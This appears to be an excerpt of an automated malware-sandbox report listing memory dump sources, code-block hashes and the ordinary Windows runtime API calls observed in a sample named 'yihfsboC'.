                                                                                                                  • Opcode Fuzzy Hash: eec1a0fa85090a94c6af7e14f41541a4695dbfba383ab96d31874636605a8c21
                                                                                                                  • Instruction Fuzzy Hash: DC41D774E012188FEB68CFAAC8407DEBBF2AF89300F10C1A9C519B7255DB355A86CF55
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544229660.0000000029950000.00000040.00000800.00020000.00000000.sdmp, Offset: 29950000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29950000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 2f3d16629c92ae07c8bed9e02d1a31690cf394b1953705914367b7b47918b493
                                                                                                                  • Instruction ID: ca5d09c0a16968ae10a3d70aea17e8f09b450f00c5d5a9cce2bc9f6644075970
                                                                                                                  • Opcode Fuzzy Hash: 2f3d16629c92ae07c8bed9e02d1a31690cf394b1953705914367b7b47918b493
                                                                                                                  • Instruction Fuzzy Hash: 2C41B674E01218CFEB68CFAAC95079EBBF2AF89300F10C0A9C519B7255DB355A86CF55
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544229660.0000000029950000.00000040.00000800.00020000.00000000.sdmp, Offset: 29950000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29950000_yihfsboC.jbxd
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544116148.0000000029930000.00000040.00000800.00020000.00000000.sdmp, Offset: 29930000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29930000_yihfsboC.jbxd
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2533626388.000000002410D000.00000040.00000800.00020000.00000000.sdmp, Offset: 2410D000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_2410d000_yihfsboC.jbxd
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2533778698.000000002411D000.00000040.00000800.00020000.00000000.sdmp, Offset: 2411D000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_2411d000_yihfsboC.jbxd
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544229660.0000000029950000.00000040.00000800.00020000.00000000.sdmp, Offset: 29950000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29950000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 530655643cd520733396f67d8e861d2e67e26f606f0e2cabbfb9ba429996db34
                                                                                                                  • Instruction ID: a7dcaeddeac488f908115dc40ef754243fe6025a54709c8db8d4f6830c0486a9
                                                                                                                  • Opcode Fuzzy Hash: 530655643cd520733396f67d8e861d2e67e26f606f0e2cabbfb9ba429996db34
                                                                                                                  • Instruction Fuzzy Hash: 4F11D075A00211CFCB94EFB8D90899E7BF5BF4826071101A6E94AEB311EB34CD028BE1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544229660.0000000029950000.00000040.00000800.00020000.00000000.sdmp, Offset: 29950000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29950000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: b2ed7fad0903ccba3eda7da228a7ac9dbfaca39a0ff06f0f41ee048fb37b9758
                                                                                                                  • Instruction ID: f3a1a8bcb67fe820442fb2cd35f2b51e63259d0535cb56743698a6d43a26cfa6
                                                                                                                  • Opcode Fuzzy Hash: b2ed7fad0903ccba3eda7da228a7ac9dbfaca39a0ff06f0f41ee048fb37b9758
                                                                                                                  • Instruction Fuzzy Hash: 4F11A535714201CFD708DA79E89692637E9AFC967531580BAE94BCB3B1EA24DC0287A0
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544116148.0000000029930000.00000040.00000800.00020000.00000000.sdmp, Offset: 29930000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29930000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: d8e5d336318f03dcce9279627284914a694f205936efdc70ea446294098e4d65
                                                                                                                  • Instruction ID: 88f1027555e5e76d7e4ab8ede447529a1014f87f4827f926dea1828f193301c2
                                                                                                                  • Opcode Fuzzy Hash: d8e5d336318f03dcce9279627284914a694f205936efdc70ea446294098e4d65
                                                                                                                  • Instruction Fuzzy Hash: D9118C353042048FC718CF6AD884E1AB7EAFF88721F1085AAE54ACB361CA71EC06CB50
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544116148.0000000029930000.00000040.00000800.00020000.00000000.sdmp, Offset: 29930000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29930000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 90b32f635f82e137ba0381001dc5976953395206cb88b8703677889e4fcbf420
                                                                                                                  • Instruction ID: 6b6758fa7f075c5853fdadc657f74944238853de470c6f9f52f772cdce374919
                                                                                                                  • Opcode Fuzzy Hash: 90b32f635f82e137ba0381001dc5976953395206cb88b8703677889e4fcbf420
                                                                                                                  • Instruction Fuzzy Hash: 0511AC36E002459FDB14EFB9848069EBBF6AF88660F904279C519F3304DB31DC028BE9
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2533626388.000000002410D000.00000040.00000800.00020000.00000000.sdmp, Offset: 2410D000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_2410d000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: f63b2946cef6f228bea6bf308b0c32d66e3d437da7a1df527002fe7e9624e2f1
                                                                                                                  • Instruction ID: 972abe847b786c5a0222373060e99deeac0f173cf9e694f8be4b424c5dae341e
                                                                                                                  • Opcode Fuzzy Hash: f63b2946cef6f228bea6bf308b0c32d66e3d437da7a1df527002fe7e9624e2f1
                                                                                                                  • Instruction Fuzzy Hash: 1111AF76504280CFCB06CF14D5C0B46BF72FB84324F24C6A9DC494B656C336D656CBA1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544116148.0000000029930000.00000040.00000800.00020000.00000000.sdmp, Offset: 29930000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29930000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 88e8d51f8b3b4652982dbaf630cffd034055cce75433ae2254b457c76fc8c174
                                                                                                                  • Instruction ID: 19efc7678a8fcde156ca5c0495cf2ca9093c5749cf97ebdfb79c64648aa37021
                                                                                                                  • Opcode Fuzzy Hash: 88e8d51f8b3b4652982dbaf630cffd034055cce75433ae2254b457c76fc8c174
                                                                                                                  • Instruction Fuzzy Hash: 730128357083905FCB0A1FB8885846D3FA6DFC731030440AAE586CF2D2EA688D47DB92
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544229660.0000000029950000.00000040.00000800.00020000.00000000.sdmp, Offset: 29950000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29950000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 56222d4aea5fdd17798c37b10963bef5c7311506f629b697f65bb424137d0ee6
                                                                                                                  • Instruction ID: 7528cb0680de08ec4a91abc0e86824aa2b07d91eb9dd3ddaa3c8e52ce9c82513
                                                                                                                  • Opcode Fuzzy Hash: 56222d4aea5fdd17798c37b10963bef5c7311506f629b697f65bb424137d0ee6
                                                                                                                  • Instruction Fuzzy Hash: 7F01D67270115CAB9B0ACE599801AAF7B9BDFC87A0F14C02DF919D7384DA75CD168B90
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544116148.0000000029930000.00000040.00000800.00020000.00000000.sdmp, Offset: 29930000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29930000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 73c2251d5b117e9408f90c5b3ce93738cae8b9a8f8a6aacaeafa211465aa56b8
                                                                                                                  • Instruction ID: 364599400747ee7737b3f8edebdd0c685cbb6ae4303c29290f9d1517d1107c91
                                                                                                                  • Opcode Fuzzy Hash: 73c2251d5b117e9408f90c5b3ce93738cae8b9a8f8a6aacaeafa211465aa56b8
                                                                                                                  • Instruction Fuzzy Hash: 56019235E00249EFCF18AF74C848AAE7BB5FB88361F404539E95693350DB3489158BA4
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2533626388.000000002410D000.00000040.00000800.00020000.00000000.sdmp, Offset: 2410D000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_2410d000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 1cd5b2b09505d31359d59e7067bbbce9aa6241e652d4d2fd9a57c918d8781bdf
                                                                                                                  • Instruction ID: 4d1259de38dba420dec8783a9cc71f1b24cb6b66d4b7ea84e05fe541ca7c6ed5
                                                                                                                  • Opcode Fuzzy Hash: 1cd5b2b09505d31359d59e7067bbbce9aa6241e652d4d2fd9a57c918d8781bdf
                                                                                                                  • Instruction Fuzzy Hash: 900126715083009EE3104B21ECC0B97BFD8DF45325F14C49AED4C0F28AC67A9A46CAB6
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544229660.0000000029950000.00000040.00000800.00020000.00000000.sdmp, Offset: 29950000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29950000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 6e2559f0332942455a72fce1b299b7a92ab67e334c5203a6426fe2263752a551
                                                                                                                  • Instruction ID: 225168ad5eadd60e32eb7b4e3c3c7aed43e2827d435e56b1608e30c2d551b552
                                                                                                                  • Opcode Fuzzy Hash: 6e2559f0332942455a72fce1b299b7a92ab67e334c5203a6426fe2263752a551
                                                                                                                  • Instruction Fuzzy Hash: 4D01DB72601159AFCB15CE659C05BEF3BA6DFC4350F14806DF559C7380D675C916CB50
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2533626388.000000002410D000.00000040.00000800.00020000.00000000.sdmp, Offset: 2410D000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_2410d000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: f609c52459b7516eb3bddc07d10ae5daef91436ded889c285cb987d289db88fe
                                                                                                                  • Instruction ID: 43a21d4b22d1dc684bb5b490633fd2ad9b27c5c8ae6a694d6f171c31432f09c8
                                                                                                                  • Opcode Fuzzy Hash: f609c52459b7516eb3bddc07d10ae5daef91436ded889c285cb987d289db88fe
                                                                                                                  • Instruction Fuzzy Hash: 9C014C7140E3C09ED3128B219895B52BFB4DF43224F19C1DBD9888F1A7C2695949CB72
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544116148.0000000029930000.00000040.00000800.00020000.00000000.sdmp, Offset: 29930000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29930000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 3bfae232810b2127af6f0602d8fbaf8d132de11d507cd30290a114c7dc8440d7
                                                                                                                  • Instruction ID: c80cd1363182d6f4828d6b81d36f3e42113dd34f865f0a98099b21584fdcc999
                                                                                                                  • Opcode Fuzzy Hash: 3bfae232810b2127af6f0602d8fbaf8d132de11d507cd30290a114c7dc8440d7
                                                                                                                  • Instruction Fuzzy Hash: 05015E35A04259EFCF28EF79D8449AE7BB5FF88361F404139E85593250DB308915DFA1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544116148.0000000029930000.00000040.00000800.00020000.00000000.sdmp, Offset: 29930000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29930000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 9cfc0ddb07eeb7fa13a2032ebbf0d9e185380fd4ab4a7677e02eea017e7a8bd9
                                                                                                                  • Instruction ID: 09c4994b108bfaab3a5cb51f8f3325d70fd58b8802bf37d6b14507d58e974a4b
                                                                                                                  • Opcode Fuzzy Hash: 9cfc0ddb07eeb7fa13a2032ebbf0d9e185380fd4ab4a7677e02eea017e7a8bd9
                                                                                                                  • Instruction Fuzzy Hash: 18F0F632B082609FC70A5B6EF41459EBBA9DFC563070840FBD444CB260DF36C802CB95
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544229660.0000000029950000.00000040.00000800.00020000.00000000.sdmp, Offset: 29950000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29950000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: bd406d15ffb66ebc7ee10ded3da7bb59050bb7b34a63d15baf56038560d02b8a
                                                                                                                  • Instruction ID: 3c6220cfad65ac3eb437cd2efa02ad0ff964d2d33c897d86f4958958de3fe593
                                                                                                                  • Opcode Fuzzy Hash: bd406d15ffb66ebc7ee10ded3da7bb59050bb7b34a63d15baf56038560d02b8a
                                                                                                                  • Instruction Fuzzy Hash: 8701A870E002199FCF44EFB9D954AAFBBF5AF49250F108569D519F7250E73899028BA0
                                                                                                                  APIs
                                                                                                                  • IsDebuggerPresent.KERNEL32 ref: 004136F4
                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00413709
                                                                                                                  • UnhandledExceptionFilter.KERNEL32(0041FB80), ref: 00413714
                                                                                                                  • GetCurrentProcess.KERNEL32(C0000409), ref: 00413730
                                                                                                                  • TerminateProcess.KERNEL32(00000000), ref: 00413737
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2505613508.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000E.00000002.2505613508.0000000000441000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_400000_yihfsboC.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2579439406-0
                                                                                                                  • Opcode ID: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                                                                                  • Instruction ID: 93bf0ba95bc2a0faef8203f21c221f33afe887fd41373e09ae0fa508b254143b
                                                                                                                  • Opcode Fuzzy Hash: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                                                                                  • Instruction Fuzzy Hash: A521C3B4601204EFD720DF65E94A6457FB4FB08356F80407AE50887772E7B86682CF4D
                                                                                                                  APIs
                                                                                                                  • GetProcessHeap.KERNEL32 ref: 0040ADD0
                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040ADE1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2505613508.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000E.00000002.2505613508.0000000000441000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_400000_yihfsboC.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Heap$FreeProcess
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3859560861-0
                                                                                                                  • Opcode ID: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
                                                                                                                  • Instruction ID: 72dd180cd7110ee49b406fd12918c6a771032a3efea8c67e715e4993f3fed615
                                                                                                                  • Opcode Fuzzy Hash: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
                                                                                                                  • Instruction Fuzzy Hash: 54E09A312003009FC320AB61DC08FA337AAEF88311F04C829E55A936A0DB78EC42CB58
                                                                                                                  APIs
                                                                                                                  • LCMapStringW.KERNEL32(00000000,00000100,00420398,00000001,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004170B3
                                                                                                                  • GetLastError.KERNEL32(?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000,?,7FFFFFFF,00000000,00000000,?,241418F0), ref: 004170C5
                                                                                                                  • MultiByteToWideChar.KERNEL32(7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 00417151
                                                                                                                  • _malloc.LIBCMT ref: 0041718A
                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171BD
                                                                                                                  • LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171D9
                                                                                                                  • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,?,?), ref: 00417213
                                                                                                                  • _malloc.LIBCMT ref: 0041724C
                                                                                                                  • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,00000000,?), ref: 00417277
                                                                                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 0041729A
                                                                                                                  • __freea.LIBCMT ref: 004172A4
                                                                                                                  • __freea.LIBCMT ref: 004172AD
                                                                                                                  • ___ansicp.LIBCMT ref: 004172DE
                                                                                                                  • ___convertcp.LIBCMT ref: 00417309
                                                                                                                  • LCMapStringA.KERNEL32(?,?,00000000,?,00000000,00000000,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?), ref: 0041732A
                                                                                                                  • _malloc.LIBCMT ref: 00417362
                                                                                                                  • _memset.LIBCMT ref: 00417384
                                                                                                                  • LCMapStringA.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?), ref: 0041739C
                                                                                                                  • ___convertcp.LIBCMT ref: 004173BA
                                                                                                                  • __freea.LIBCMT ref: 004173CF
                                                                                                                  • LCMapStringA.KERNEL32(?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004173E9
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2505613508.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000E.00000002.2505613508.0000000000441000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_400000_yihfsboC.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: String$ByteCharMultiWide__freea_malloc$___convertcp$ErrorLast___ansicp_memset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3809854901-0
                                                                                                                  • Opcode ID: b16ff40dd4ba9ebc371e1f7effab867f6711c58894302612c2f4823bb6b89e2c
                                                                                                                  • Instruction ID: cdfffc9a1d2b3026f9ae82d5cc8d175594050d3ba9b5f3d3ede674b9b5b9b85c
                                                                                                                  • Opcode Fuzzy Hash: b16ff40dd4ba9ebc371e1f7effab867f6711c58894302612c2f4823bb6b89e2c
                                                                                                                  • Instruction Fuzzy Hash: 29B1B072908119EFCF119FA0CC808EF7BB5EF48354B14856BF915A2260D7398DD2DB98
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2505613508.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000E.00000002.2505613508.0000000000441000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_400000_yihfsboC.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3886058894-0
                                                                                                                  • Opcode ID: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
                                                                                                                  • Instruction ID: 0234425abcb0213f77efd30778ac7634d7a408156a07f93f58cd91f86a00e979
                                                                                                                  • Opcode Fuzzy Hash: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
                                                                                                                  • Instruction Fuzzy Hash: 1E519031A00605ABCB209F69C844A9FBB75EF41324F24863BF825B22D1D7799E51CBDD
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleA.KERNEL32(KERNEL32,0040CDF5), ref: 00413615
                                                                                                                  • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00413625
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2505613508.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000E.00000002.2505613508.0000000000441000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_400000_yihfsboC.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                                  • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                                                  • API String ID: 1646373207-3105848591
                                                                                                                  • Opcode ID: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
                                                                                                                  • Instruction ID: 3bb3582238f4ecb0ba7b9e8fe578e45fdcf0af3c55e5dfe2a5e3893bc0ad87fb
                                                                                                                  • Opcode Fuzzy Hash: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
                                                                                                                  • Instruction Fuzzy Hash: 96F06230600A09E2DB105FA1ED1E2EFBB74BB80746F5101A19196B0194DF38D0B6825A
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2505613508.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000E.00000002.2505613508.0000000000441000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_400000_yihfsboC.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: _fseek_malloc_memset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 208892515-0
                                                                                                                  • Opcode ID: 9fe2477137ff98b8fe919820eb2b1ff53dfeab7efe35faa63f44dd20cd1a70ab
                                                                                                                  • Instruction ID: b5a371ba5f9a3ad1fa090fb1a89082137fe8d6c03bc5c52cd66242ccf2a60741
                                                                                                                  • Opcode Fuzzy Hash: 9fe2477137ff98b8fe919820eb2b1ff53dfeab7efe35faa63f44dd20cd1a70ab
                                                                                                                  • Instruction Fuzzy Hash: 3541A572600F018AD630972EE804B2772E5DF90364F140A3FE9E6E27D5E738E9458F89
                                                                                                                  APIs
                                                                                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004152D3
                                                                                                                  • __isleadbyte_l.LIBCMT ref: 00415307
                                                                                                                  • MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?), ref: 00415338
                                                                                                                  • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?), ref: 004153A6
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2505613508.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000E.00000002.2505613508.0000000000441000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_400000_yihfsboC.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3058430110-0
                                                                                                                  • Opcode ID: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
                                                                                                                  • Instruction ID: 094900ada7e667e90e346a2540d450e67f5821ec0926a3c2ae07879bc245b0d1
                                                                                                                  • Opcode Fuzzy Hash: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
                                                                                                                  • Instruction Fuzzy Hash: 1831A032A00649EFDB20DFA4C8809EE7BB5EF41350B1885AAE8659B291D374DD80DF59
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2505613508.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000E.00000002.2505613508.0000000000441000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_400000_yihfsboC.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3016257755-0
                                                                                                                  • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                  • Instruction ID: bfd0e68975b3765f24e543ba70b005e9871d43ed2f52156b65e62ceec70126f9
                                                                                                                  • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                  • Instruction Fuzzy Hash: DA117E7200014EBBCF125E85CC418EE3F27BF18755B58841AFE2858130D73BCAB2AB89